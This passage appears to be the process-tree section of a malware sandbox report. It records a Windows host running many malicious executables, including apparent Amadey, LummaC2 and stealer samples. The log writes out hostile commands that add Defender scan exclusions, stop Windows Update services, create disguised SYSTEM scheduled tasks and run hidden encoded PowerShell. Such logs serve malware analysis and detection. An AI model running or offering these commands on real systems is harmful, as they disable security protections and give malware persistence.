    3⤵
    PID:9636
- C:\Users\Admin\AppData\Local\Temp\a\info.exe
  "C:\Users\Admin\AppData\Local\Temp\a\info.exe"
  2⤵
  PID:3568
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3384
- C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe"
  2⤵
  PID:8864
- C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe"
  2⤵
  PID:7592
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 1340
    3⤵
    - Program crash
    PID:656
- C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe
  "C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe"
  2⤵
  PID:9484
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:1364
- - C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe"
    3⤵
    PID:6096
- C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
  "C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
  2⤵
  PID:7316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD767.tmp.bat""
    3⤵
    PID:12000
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:10992
  - - C:\ProgramData\x64netJS\JQSZY.exe
      "C:\ProgramData\x64netJS\JQSZY.exe"
      4⤵
      PID:10600
- C:\Users\Admin\AppData\Local\Temp\a\kur90.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kur90.exe"
  2⤵
  PID:10196
- - C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\lI8ev35.exe
    C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\lI8ev35.exe
    3⤵
    PID:3340
  - - C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\Rv0Mc95.exe
      C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\Rv0Mc95.exe
      4⤵
      PID:4180
    - - C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\Li1NB00.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\Li1NB00.exe
        5⤵
        
        PID:9172
      - C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\Ak0ZJ20.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\Ak0ZJ20.exe
        6⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\1PI83NU2.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\1PI83NU2.exe
        7⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\2MZ6102.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\2MZ6102.exe
        7⤵
        
        PID:11248
      - C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\3AL86BH.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\3AL86BH.exe
        6⤵
        
        PID:8336
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:9684
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:10748
    - - C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\4BD931Bw.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\4BD931Bw.exe
        5⤵
        
        PID:10028
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:732
  - - C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\5bu2Sb3.exe
      C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\5bu2Sb3.exe
      4⤵
      PID:7540
- - C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\6Qi2kv4.exe
    C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\6Qi2kv4.exe
    3⤵
    PID:8176
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\264.tmp\265.tmp\266.bat C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\6Qi2kv4.exe"
      4⤵
      PID:11236
- C:\Users\Admin\AppData\Local\Temp\a\ed1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ed1.exe"
  2⤵
  PID:8112
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:11240
- C:\Users\Admin\AppData\Local\Temp\a\information.exe
  "C:\Users\Admin\AppData\Local\Temp\a\information.exe"
  2⤵
  PID:8752
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:968
- C:\Users\Admin\AppData\Local\Temp\a\rFXRoh.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rFXRoh.exe"
  2⤵
  PID:2648
- C:\Users\Admin\AppData\Local\Temp\a\herom.exe
  "C:\Users\Admin\AppData\Local\Temp\a\herom.exe"
  2⤵
  PID:3348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c .\ECV3TCK.bAT
    3⤵
    PID:9092
  - - C:\Windows\SysWOW64\control.exe
      CoNtrOl.ExE "C:\Users\Admin\AppData\Local\Temp\7zS41D9CBAA\RHhtpC.H"
      4⤵
      PID:7804
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\7zS41D9CBAA\RHhtpC.H"
        5⤵
        
        PID:10376
      - C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\7zS41D9CBAA\RHhtpC.H"
        6⤵
        
        PID:10504
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\7zS41D9CBAA\RHhtpC.H"
        7⤵
        
        PID:3804
- C:\Users\Admin\AppData\Local\Temp\a\mtdocs.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mtdocs.exe"
  2⤵
  PID:8396
- - C:\Users\Admin\AppData\Local\Temp\bhkgnm.exe
    "C:\Users\Admin\AppData\Local\Temp\bhkgnm.exe"
    3⤵
    PID:4044
  - - C:\Users\Admin\AppData\Local\Temp\bhkgnm.exe
      "C:\Users\Admin\AppData\Local\Temp\bhkgnm.exe"
      4⤵
      PID:8316
- C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe"
  2⤵
  PID:5132
- C:\Users\Admin\AppData\Local\Temp\a\tiworker.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tiworker.exe"
  2⤵
  PID:9352
- - C:\Users\Admin\AppData\Local\Temp\wirybscjwh.exe
    "C:\Users\Admin\AppData\Local\Temp\wirybscjwh.exe"
    3⤵
    PID:5528
  - - C:\Users\Admin\AppData\Local\Temp\wirybscjwh.exe
      "C:\Users\Admin\AppData\Local\Temp\wirybscjwh.exe"
      4⤵
      PID:10532
- C:\Users\Admin\AppData\Local\Temp\a\ja8drj17aq2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ja8drj17aq2.exe"
  2⤵
  PID:10384
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:11040
- C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Cpp.exe
  "C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Cpp.exe"
  2⤵
  PID:10564
- C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Sharp.exe
  "C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Sharp.exe"
  2⤵
  PID:10776
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10776 -s 808
    3⤵
    - Program crash
    PID:10472
- C:\Users\Admin\AppData\Local\Temp\a\WWW14_64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WWW14_64.exe"
  2⤵
  PID:10996
- C:\Users\Admin\AppData\Local\Temp\a\3231322212.exe
  "C:\Users\Admin\AppData\Local\Temp\a\3231322212.exe"
  2⤵
  PID:11224
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:3472
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:7320
- C:\Users\Admin\AppData\Local\Temp\a\UNIQTRAFF.exe
  "C:\Users\Admin\AppData\Local\Temp\a\UNIQTRAFF.exe"
  2⤵
  PID:7676
- C:\Users\Admin\AppData\Local\Temp\a\Elize123.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Elize123.exe"
  2⤵
  PID:2264
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:10848
- C:\Users\Admin\AppData\Local\Temp\a\ja8drj17aq21234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ja8drj17aq21234.exe"
  2⤵
  PID:10748
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:10900
- C:\Users\Admin\AppData\Local\Temp\a\Services.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Services.exe"
  2⤵
  PID:10916
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6112
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:7360
- C:\Users\Admin\AppData\Local\Temp\a\birza.exe
  "C:\Users\Admin\AppData\Local\Temp\a\birza.exe"
  2⤵
  PID:11200
- C:\Users\Admin\AppData\Local\Temp\a\WinDhcp.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WinDhcp.exe"
  2⤵
  PID:10964
- C:\Users\Admin\AppData\Local\Temp\a\clean.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clean.exe"
  2⤵
  PID:10572
- C:\Users\Admin\AppData\Local\Temp\a\rh111.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rh111.exe"
  2⤵
  PID:7984
- - C:\Users\Admin\AppData\Local\Temp\a\rh111.exe
    C:\Users\Admin\AppData\Local\Temp\a\rh111.exe
    3⤵
    PID:8860
- C:\Users\Admin\AppData\Local\Temp\a\asca1ex.exe
  "C:\Users\Admin\AppData\Local\Temp\a\asca1ex.exe"
  2⤵
  PID:10820
- C:\Users\Admin\AppData\Local\Temp\a\rh_0.4.9rc1123.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rh_0.4.9rc1123.exe"
  2⤵
  PID:3448
- C:\Users\Admin\AppData\Local\Temp\a\-irrkt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\-irrkt.exe"
  2⤵
  PID:10064
- C:\Users\Admin\AppData\Local\Temp\a\retain.exe
  "C:\Users\Admin\AppData\Local\Temp\a\retain.exe"
  2⤵
  PID:4016
- C:\Users\Admin\AppData\Local\Temp\a\axes.exe
  "C:\Users\Admin\AppData\Local\Temp\a\axes.exe"
  2⤵
  PID:4540
- C:\Users\Admin\AppData\Local\Temp\a\irrkt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\irrkt.exe"
  2⤵
  PID:3152
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:5424
- C:\Users\Admin\AppData\Local\Temp\a\Abzyvhxf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Abzyvhxf.exe"
  2⤵
  PID:9080
- C:\Users\Admin\AppData\Local\Temp\a\WhiteCrypt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WhiteCrypt.exe"
  2⤵
  PID:5908
- C:\Users\Admin\AppData\Local\Temp\a\Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Dropper.exe"
  2⤵
  PID:10364
- C:\Users\Admin\AppData\Local\Temp\a\App1234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\App1234.exe"
  2⤵
  PID:10844
- C:\Users\Admin\AppData\Local\Temp\a\Dropper1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Dropper1.exe"
  2⤵
  PID:2520
- C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"
  2⤵
  PID:10356
- C:\Users\Admin\AppData\Local\Temp\a\rh_0.4.9rc1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rh_0.4.9rc1.exe"
  2⤵
  PID:9968
- C:\Users\Admin\AppData\Local\Temp\a\2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\2.exe"
  2⤵
  PID:10992
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:10576
- C:\Users\Admin\AppData\Local\Temp\a\cgpcc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cgpcc.exe"
  2⤵
  PID:11088
- C:\Users\Admin\AppData\Local\Temp\a\d3xi5rws2ffuli.exe
  "C:\Users\Admin\AppData\Local\Temp\a\d3xi5rws2ffuli.exe"
  2⤵
  PID:7112
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5188
- C:\Users\Admin\AppData\Roaming\msorc32r\ManyCam.exe
  C:\Users\Admin\AppData\Roaming\msorc32r\ManyCam.exe
  2⤵
  PID:7076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    PID:8804
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:12276
- C:\Users\Admin\AppData\Local\Temp\a\BestSoftware.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BestSoftware.exe"
  2⤵
  PID:8980
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:6624
- C:\Users\Admin\AppData\Local\Temp\a\v4install.exe
  "C:\Users\Admin\AppData\Local\Temp\a\v4install.exe"
  2⤵
  PID:8224
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\cMC3vG7uf0oG.vbe"
    3⤵
    PID:9800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\b7te9U2.bat" "
      4⤵
      PID:10164
- C:\Users\Admin\AppData\Local\Temp\a\test.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
  2⤵
  PID:7248
- C:\Users\Admin\AppData\Roaming\input\ManyCam.exe
  C:\Users\Admin\AppData\Roaming\input\ManyCam.exe
  2⤵
  PID:10392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    PID:5820
- C:\Users\Admin\AppData\Local\Temp\a\stubweb3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\stubweb3.exe"
  2⤵
  PID:11232
- C:\Users\Admin\AppData\Local\Temp\a\stub.exe
  "C:\Users\Admin\AppData\Local\Temp\a\stub.exe"
  2⤵
  PID:11672
- C:\Users\Admin\AppData\Local\Temp\a\crypt1234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypt1234.exe"
  2⤵
  PID:9576
- C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
  "C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
  2⤵
  PID:12056

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:4508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6388

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:5540
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:8128
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8048
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4048
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8932
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:9100

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:7256

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cr8iP6CX.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cr8iP6CX.exe
1⤵
PID:7000
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\BV2uu9np.exe
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\BV2uu9np.exe
  2⤵
  PID:4076
- - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Mg967yC.exe
    C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Mg967yC.exe
    3⤵
    PID:10204

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1mA06VY8.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1mA06VY8.exe
1⤵
PID:4756
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:9744

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kj8LN0rN.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kj8LN0rN.exe
1⤵
PID:8152

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7292
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:7788
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8356
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:8280
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8764
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:9576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe"
1⤵
PID:7420
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  PID:7556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:7948

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:5708

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:6456

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5932
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5776
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:8632
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:9320
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:9708

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:7380

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yjkibfzfvbok.xml"
1⤵
- Creates scheduled task(s)
PID:9108

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:8600

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:8516
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:9656
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:9480
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:7568
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8368

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:6112
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:10020
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3636
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5908
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8072
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:8656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5640

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\yes.exe"
1⤵
PID:5268
- C:\Windows\System32\choice.exe
  choice /C Y /N /D Y /T 3
  2⤵
  PID:9804

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:8420

C:\Windows\SysWOW64\colorcpl.exe
"C:\Windows\SysWOW64\colorcpl.exe"
1⤵
PID:8572
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
  2⤵
  PID:9688

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
1⤵
- Creates scheduled task(s)
PID:9616

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:10056

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:1232

C:\Users\Admin\AppData\Local\Temp\B9FF.exe
C:\Users\Admin\AppData\Local\Temp\B9FF.exe
1⤵
PID:7408
- C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\Yv9Iq9Uz.exe
  C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\Yv9Iq9Uz.exe
  2⤵
  PID:1396
- - C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\lC7EY8RZ.exe
    C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\lC7EY8RZ.exe
    3⤵
    PID:9820
  - - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\Bk9Yf2ib.exe
      C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\Bk9Yf2ib.exe
      4⤵
      PID:6456
    - - C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\DH6RB5lU.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\DH6RB5lU.exe
        5⤵
        
        PID:8132
      - C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\1Ku25OO5.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\1Ku25OO5.exe
        6⤵
        
        PID:7824
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4064
      - C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\2Ze484sG.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\2Ze484sG.exe
        6⤵
        
        PID:9240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1020

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:1728

C:\Users\Admin\AppData\Local\Temp\C6E1.exe
C:\Users\Admin\AppData\Local\Temp\C6E1.exe
1⤵
PID:3092

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:4400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5744

\??\c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:9912
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  PID:6684
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:9268
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\SysWOW64\wscript.exe"
    3⤵
    PID:5888
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    3⤵
    PID:9392
  - - C:\Windows\System32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3888
  - - C:\Windows\SysWOW64\cmmon32.exe
      "C:\Windows\SysWOW64\cmmon32.exe"
      4⤵
      PID:9680
    - - C:\Program Files\Mozilla Firefox\Firefox.exe
        
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        5⤵
        
        PID:6256
  - - C:\Windows\System32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:3056
  - - C:\Windows\System32\sc.exe
      sc stop wuauserv
      4⤵
